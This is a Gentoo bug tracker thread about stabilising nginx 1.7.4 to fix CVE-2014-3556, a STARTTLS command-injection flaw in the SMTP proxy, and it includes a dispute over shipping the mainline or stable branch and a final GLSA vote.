A bug in nginx SMTP proxy was found, which allows an attacker in a privileged network position to inject commands into SSL sessions started with the STARTTLS command, potentially making it possible to steal sensitive information sent by clients (CVE-2014-3556). The problem affects nginx 1.5.6 - 1.7.3. The problem is fixed in nginx 1.7.4, 1.6.1. We don't have the 1.6.x series in tree, but this applies to our 1.5.13 as well. This puts us in a situation where we'd want to STABLEREQ 1.7.4 once this hits tree, which isn't optimal. I'll talk with the rest of the nginx maintainers about what to do as soon as we have ebuilds in tree. You can find ebuilds to review for these versions in our nginx-overlay: github.com/gentoo/nginx-overlay
Thanks for the report
ok, nginx-1.7.4 is ready for stabilization. ppc had nginx-1.7.2 keyworded (and has stable keyword for earlier versions) but the keywords got dropped since luajit is not keyword. I would recommend to mask the luajit USE flag for now such that ppc can get a stable nginx as well.
Arches, please test and mark stable: =www-servers/nginx-1.7.4 Target keywords : "amd64 x86"
amd64 stable
x86 stable. Maintainer(s), please cleanup. Security, please vote.
cleanup done.
IIRC only versions from stable branches was stabilized in gentoo in the past. So why 1.7.4 instead of 1.6.1 (not even in the tree)?
(In reply to Alexander Tsoy from comment #7) > IIRC only versions from stable branches was stabilized in gentoo in the > past. So why 1.7.4 instead of 1.6.1 (not even in the tree)? We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream recommends to use the mainline series[1]. You can read more about rationale and get additional versions in our overlay, found here[2] [1]: http://nginx.com/blog/nginx-1-6-1-7-released/ [2]: https://github.com/gentoo/nginx-overlay
(In reply to Johan Bergström from comment #8) > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream > recommends to use the mainline series[1]. Upstream recommends to use the mainline for developers, but not for end-users. For non-developers upstream recommends to use stable 1.6 or even nginx+ So, feel free to develope any version you want, but bring back stable nginx to portage, please.
(In reply to Lunacharsky from comment #9) > (In reply to Johan Bergström from comment #8) > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream > > recommends to use the mainline series[1]. > > Upstream recommends to use the mainline for developers, but not for > end-users. For non-developers upstream recommends to use stable 1.6 or even > nginx+ > So, feel free to develope any version you want, but bring back stable nginx > to portage, please. Can you back this claim somehow? Because link [1] clearly suggests something else: "Note that stable does not mean ‘more reliable or more bug-free’. In fact, mainline is generally regarded as more reliable because only critical fixes are merged to stable."
(In reply to Tiziano Müller from comment #10) > (In reply to Lunacharsky from comment #9) > > (In reply to Johan Bergström from comment #8) > > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream > > > recommends to use the mainline series[1]. > > > > Upstream recommends to use the mainline for developers, but not for > > end-users. For non-developers upstream recommends to use stable 1.6 or even > > nginx+ > > So, feel free to develope any version you want, but bring back stable nginx > > to portage, please. > > Can you back this claim somehow? Because link [1] clearly suggests something > else: > > "Note that stable does not mean ‘more reliable or more bug-free’. In fact, > mainline is generally regarded as more reliable because only critical fixes > are merged to stable." and: "NGINX Plus tracks the mainline version of NGINX"
(In reply to Tiziano Müller from comment #10) > (In reply to Lunacharsky from comment #9) > > (In reply to Johan Bergström from comment #8) > > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream > > > recommends to use the mainline series[1]. > > > > Upstream recommends to use the mainline for developers, but not for > > end-users. For non-developers upstream recommends to use stable 1.6 or even > > nginx+ > > So, feel free to develope any version you want, but bring back stable nginx > > to portage, please. > > Can you back this claim somehow? Because link [1] clearly suggests something > else: > > "Note that stable does not mean ‘more reliable or more bug-free’. In fact, > mainline is generally regarded as more reliable because only critical fixes > are merged to stable." Link[1] for developers, who compiling everyday ) But that link is not for end-users, who compiling if and when it really needed. Since release of 1.6 and 1.7: 1.6 must be reinstalled 1 time - 1.6.1 now 1.7 must be reinstalled 4 times - 1.7.4 now 1.6 - is more suitable for production purposes. But, as I can see, you don't think about users who use gentoo and nginx in production. > and: "NGINX Plus tracks the mainline version of NGINX" Yes, it is. But released less often, then mainline. Stable version of Nginx also tracks the mainline, and also released less often. Because of similar idea of stable and nginx+ - use in production. So, feel free to develop any version you want, but bring back stable nginx to portage, please.
(In reply to Lunacharsky from comment #12) > (In reply to Tiziano Müller from comment #10) > > (In reply to Lunacharsky from comment #9) > > > (In reply to Johan Bergström from comment #8) > > > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream > > > > recommends to use the mainline series[1]. > > > > > > Upstream recommends to use the mainline for developers, but not for > > > end-users. For non-developers upstream recommends to use stable 1.6 or even > > > nginx+ > > > So, feel free to develope any version you want, but bring back stable nginx > > > to portage, please. > > > > Can you back this claim somehow? Because link [1] clearly suggests something > > else: > > > > "Note that stable does not mean ‘more reliable or more bug-free’. In fact, > > mainline is generally regarded as more reliable because only critical fixes > > are merged to stable." > > Link[1] for developers, who compiling everyday ) But that link is not for > end-users, who compiling if and when it really needed. > Since release of 1.6 and 1.7: > 1.6 must be reinstalled 1 time - 1.6.1 now > 1.7 must be reinstalled 4 times - 1.7.4 now > 1.6 - is more suitable for production purposes. > But, as I can see, you don't think about users who use gentoo and nginx in > production. > > > and: "NGINX Plus tracks the mainline version of NGINX" > Yes, it is. But released less often, then mainline. Stable version of Nginx > also tracks the mainline, and also released less often. Because of similar > idea of stable and nginx+ - use in production. > > So, feel free to develop any version you want, but bring back stable nginx > to portage, please. Here's a quote from that blog post: Which version should I use? In general, you should deploy the NGINX mainline branch at all times. That's clear enough to me.
(In reply to Johan Bergström from comment #13) > (In reply to Lunacharsky from comment #12) > > (In reply to Tiziano Müller from comment #10) > > > (In reply to Lunacharsky from comment #9) > > > > (In reply to Johan Bergström from comment #8) > > > > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream > > > > > recommends to use the mainline series[1]. > > > > > > > > Upstream recommends to use the mainline for developers, but not for > > > > end-users. For non-developers upstream recommends to use stable 1.6 or even > > > > nginx+ > > > > So, feel free to develope any version you want, but bring back stable nginx > > > > to portage, please. > > > > > > Can you back this claim somehow? Because link [1] clearly suggests something > > > else: > > > > > > "Note that stable does not mean ‘more reliable or more bug-free’. In fact, > > > mainline is generally regarded as more reliable because only critical fixes > > > are merged to stable." > > > > Link[1] for developers, who compiling everyday ) But that link is not for > > end-users, who compiling if and when it really needed. > > Since release of 1.6 and 1.7: > > 1.6 must be reinstalled 1 time - 1.6.1 now > > 1.7 must be reinstalled 4 times - 1.7.4 now > > 1.6 - is more suitable for production purposes. > > But, as I can see, you don't think about users who use gentoo and nginx in > > production. > > > > > and: "NGINX Plus tracks the mainline version of NGINX" > > Yes, it is. But released less often, then mainline. Stable version of Nginx > > also tracks the mainline, and also released less often. Because of similar > > idea of stable and nginx+ - use in production. > > > > So, feel free to develop any version you want, but bring back stable nginx > > to portage, please. > > Here's a quote from that blog post: > Which version should I use? > In general, you should deploy the NGINX mainline branch at all times. > > That's clear enough to me. Nginx Inc. needs free testers for mainline branch. That why they wrote that blog post. If you employee of Nginx Inc. then you have to believe in corporate blog posts and don't care about gentoo users. Bring back stable nginx to portage, please.
(In reply to Lunacharsky from comment #14) > (In reply to Johan Bergström from comment #13) > > (In reply to Lunacharsky from comment #12) > > > (In reply to Tiziano Müller from comment #10) > > > > (In reply to Lunacharsky from comment #9) > > > > > (In reply to Johan Bergström from comment #8) > > > > > > We chose to skip 1.6 since it was branched simultaneously as 1.7. Upstream > > > > > > recommends to use the mainline series[1]. > > > > > > > > > > Upstream recommends to use the mainline for developers, but not for > > > > > end-users. For non-developers upstream recommends to use stable 1.6 or even > > > > > nginx+ > > > > > So, feel free to develope any version you want, but bring back stable nginx > > > > > to portage, please. > > > > > > > > Can you back this claim somehow? Because link [1] clearly suggests something > > > > else: > > > > > > > > "Note that stable does not mean ‘more reliable or more bug-free’. In fact, > > > > mainline is generally regarded as more reliable because only critical fixes > > > > are merged to stable." > > > > > > Link[1] for developers, who compiling everyday ) But that link is not for > > > end-users, who compiling if and when it really needed. > > > Since release of 1.6 and 1.7: > > > 1.6 must be reinstalled 1 time - 1.6.1 now > > > 1.7 must be reinstalled 4 times - 1.7.4 now > > > 1.6 - is more suitable for production purposes. > > > But, as I can see, you don't think about users who use gentoo and nginx in > > > production. > > > > > > > and: "NGINX Plus tracks the mainline version of NGINX" > > > Yes, it is. But released less often, then mainline. Stable version of Nginx > > > also tracks the mainline, and also released less often. Because of similar > > > idea of stable and nginx+ - use in production. > > > > > > So, feel free to develop any version you want, but bring back stable nginx > > > to portage, please. > > > > Here's a quote from that blog post: > > Which version should I use? > > In general, you should deploy the NGINX mainline branch at all times. > > > > That's clear enough to me. > > Nginx Inc. needs free testers for mainline branch. That why they wrote that > blog post. If you employee of Nginx Inc. then you have to believe in > corporate blog posts and don't care about gentoo users. > > Bring back stable nginx to portage, please. We're not going to change this. We don't ignore opinions like yours, which is why we offer most nginx branches in an overlay. If you want to discuss further, ping me (jbergstroem) at freenode. Otherwise, please let this security bug be a security bug and not opinion.
(In reply to Johan Bergström from comment #15) > We're not going to change this. Yes, I know, non-smart people never change decisions. > please let this security bug be a security bug We will get alot of security bugs in unstable 1.7 branch, because of you.
Thanks for your work, guys. GLSA vote: no
Arches and Maintainer(s), Thank you for your work. GLSA Vote: No No GLSA - Closing Bug as Resolved
